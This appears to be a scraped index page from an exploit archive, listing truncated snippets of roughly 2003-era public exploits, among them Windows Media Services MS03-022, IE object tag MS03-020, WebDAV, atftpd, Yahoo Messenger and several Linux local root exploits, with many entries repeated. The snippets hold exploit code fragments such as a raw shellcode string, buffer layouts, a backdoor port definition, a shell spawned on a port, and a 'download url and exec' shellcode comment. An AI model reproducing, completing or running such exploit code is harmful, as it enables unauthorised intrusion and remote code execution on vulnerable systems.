Microsoft Windows Media Services - Remote (MS03-022)

Microsoft Windows Media Services - Remote MS03-022 // Windows Media Services Remote Command Execution 2 // v. 1.0 beta // c firew0rker //tN The N0b0D1eS include include include ifdef WIN32 include pragma commentlib, "wsock32" else include include include include include include define SOCKET int...

PoC for Internet Explorer >=5.0 buffer overflow (trivial exploit for hard case).

Dear [email protected], Attached exploit for 1 works with 70 probability on Windows NT 4.0 I didn't tested on different systems and it may differ, I don't care because I only wanted to show code execution IS possible. It works slow and may require few minutes to complete, see explanation...

DSR-korean-elm.pl

DSR-korean-elm.pl - kokaninATdtors.net vs. /usr/ports/korean/elm offset, retaddr and shellcode is for my FreeBSD 4.7-RELEASE, YMMV reinventing the wheel, http://www.insecure.org/sploits/elm.curses.overflow.html shellcode by zillionATsafemode.org ko-elm-2.4h4.1 ELM Mail User Agent, patched for...

Yahoo Messenger 5.5 Remote Exploit (DSR-ducky.c)

Exploit for unknown platform in category remote exploits ================================================ Yahoo Messenger 5.5 Remote Exploit DSR-ducky.c ================================================ / --- Remote yahoo Messenger V5.5 exploiter on Windows XP --- Dtors Security Research DSR Code...

Yahoo Messenger 5.5 Remote Exploit (DSR-ducky.c)

No description provided by source. / --- Remote yahoo Messenger V5.5 exploiter on Windows XP --- Dtors Security Research DSR Code by: Rave The buffer looks like this |-----| Fillup x offsetJMP 0x3EIPNOPSSHELLCODE ^^ / include windows.h include stdio.h include stdlib.h include string.h include...

MS Windows WebDav II (New) Remote Root Exploit

Exploit for unknown platform in category remote exploits ============================================== MS Windows WebDav II New Remote Root Exploit ============================================== // / 29/05/2003 - by Alumni - / / Microsoft IIS WebDAV New Exploit / / spawns shell on port 32768 / /...

Atftpd 0.6 Remote Root Exploit (atftpdx.c)

Exploit for linux platform in category remote exploits ========================================== Atftpd 0.6 Remote Root Exploit atftpdx.c ========================================== / PoC linux/86 remote exploit against atftpd c gunzip FIXED / include include include include include include inclu...

Atftpd 0.6 - 'atftpdx.c' Remote Command Execution

/ PoC linux/86 remote exploit against atftpd c gunzip FIXED / include include include include include include include include include include define HEAPSTART 0x080514b4 define HEAPEND 0x080594b4 define BACKDOOR "rfe" / port MUST be 1024 / define NOPNUM 128 / number of nops / define PORT 69 / tft...

Atftpd 0.6 - atftpdx.c Remote Command Execution

Atftpd 0.6 - atftpdx.c Remote Command Execution / PoC linux/86 remote exploit against atftpd c gunzip FIXED / include include include include include include include include include include define HEAPSTART 0x080514b4 define HEAPEND 0x080594b4 define BACKDOOR "rfe" / port MUST be 1024 / define...

Mandrake Linux 8.2 - '/usr/mail' Local Overflow

!/usr/bin/perl Mandrake 8.2 /usr/mail local exploit Usage: perl d86mail.pl offset Then enter "." dot and press 'Enter' Example: satan@localhost my$ perl d86mail.pl eip: 0xbffffddd .enter Cc: too long to edit sh-2.05$ $shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"...

Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl)

Exploit for linux platform in category local exploits ======================================================= Mandrake Linux 8.2 /usr/mail local exploit d86mail.pl ======================================================= !/usr/bin/perl Mandrake 8.2 /usr/mail local exploit Usage: perl d86mail.pl...

Mandrake Linux 8.2 - usrmail Local Overflow

Mandrake Linux 8.2 - usrmail Local Overflow !/usr/bin/perl Mandrake 8.2 /usr/mail local exploit Usage: perl d86mail.pl offset Then enter "." dot and press 'Enter' Example: satan@localhost my$ perl d86mail.pl eip: 0xbffffddd .enter Cc: too long to edit sh-2.05$ $shellcode =...

IE-object tag longtype exploit

!/usr/bin/perl =synopsis 06/06/03 - Proof of concept exploit by Sir Alumni [email protected] IE-Object longtype dynamic call oferflow ... url://$shellcode'/'x48jmp ptrsh the flaw actually exists in URLMON.DLL when converting backslashes to wide char, this can be seen on stack dump near...

Microsoft Internet Explorer - Object Tag (MS03-020)

Microsoft Internet Explorer - Object Tag MS03-020 !/usr/bin/perl Proof of concept exploit on IE 5.x - 6.x by Alumni IE-Object longtype dynamic call oferflow url:// the flaw actually exists in URLMON.DLL when converting backslashes to wide char, this can be seen on stack dump near...

Microsoft Internet Explorer - Object Tag (MS03-020)

!/usr/bin/perl Proof of concept exploit on IE 5.x - 6.x by Alumni IE-Object longtype dynamic call oferflow url:// the flaw actually exists in URLMON.DLL when converting backslashes to wide char, this can be seen on stack dump near '&CLSID=AAA...2F2F...'. To exploit: i start server perl script; ii...

kon2 exploit!!

I look kon2 source and -Console arg is the problem, so here go the PoC. ----cut here-------- !/usr/bin/perl Priv8security.com kon2 version 0.3.9b-16 and local root exploit. Tested on Redhat 8.0. should work on 9.0 and 7.3 Bug happens on -Coding arg. Based on Redhat Advisory. wsxz@localhost buffer...

xmame gain root exploit

/ --------------------------------------------------------------------------- Web: http://qb0x.net Author: Gabriel A. Maggiotti Date: March 31, 2003 E-mail: [email protected] --------------------------------------------------------------------------- / include stdio.h define OFFSET 1058 defi...

Batalla Naval 1.0 4 - Remote Buffer Overflow (1)

source: https://www.securityfocus.com/bid/7699/info Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server. !/usr/bin/perl Priv8security.com remote...

Maelstrom Server 3.0.x - Argument Buffer Overflow (2)

// source: https://www.securityfocus.com/bid/7630/info Maelstrom for Linux has been reported prone to a buffer overflow vulnerability. The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be...

Microsoft Windows XP - 'explorer.exe' Local Buffer Overflow

include include include include include char shellcode= //download url and exec shellcode //doesn't have any hardcoded values //except the base address of the program //searches the import table for //LoadLibraryA, GetProcAddress and ExitProcess. //by .einstein., dH team...